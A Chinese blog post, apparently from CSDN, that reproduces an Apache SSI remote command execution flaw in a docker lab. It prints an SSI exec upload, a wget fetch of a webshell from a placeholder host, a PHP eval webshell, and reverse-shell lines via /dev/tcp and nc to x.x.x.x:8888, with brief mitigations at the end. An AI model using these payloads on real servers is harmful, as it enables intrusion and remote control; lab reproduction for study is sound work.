Apache SSI 远程命令执行漏洞复现

最新推荐文章于 2023-02-20 10:42:27 发布

xzhome

最新推荐文章于 2023-02-20 10:42:27 发布

阅读量101

点赞数

分类专栏：中间件漏洞文章标签：安全 django python

本文链接：https://blog.csdn.net/qq_48985780/article/details/121399643

版权

22 篇文章 3 订阅

订阅专栏

当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用语法执行命令。

使用SSI(Server Side Include)的html文件扩展名，SSI（Server Side Include)，通常称为"服务器端嵌入"或者叫"服务器端包含"，是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

使用docker搭建漏洞环境,启动环境

docker-compose build

docker-compose up -d

浏览器访问http://172.17.0.1:8080/upload.php,即可看到一个上传表单。

上传一个php文件,提示不支持的上传的类型

上传一个shell.shtml文件

<!--#exec cmd="id" -->

浏览器访问上传的文件,下图可以看到成功执行代码,说明存在远程命令执行漏洞

上传webshell：

<!--#exec cmd="wget http://xxx/shell.txt | rename shell.txt shell.php" -->
echo '<?php @eval($_POST[margin]);?>' > shell.php

反弹shell：

<!--#exec cmd="/bin/bash -i > /dev/tcp/x.x.x.x/8888 0<&1 2>&1" -->
<!--#exec cmd="nc x.x.x.x 8888 -e /bin/bash"-->

关闭ssl

对shtml进行黑名单限制

关注

专栏目录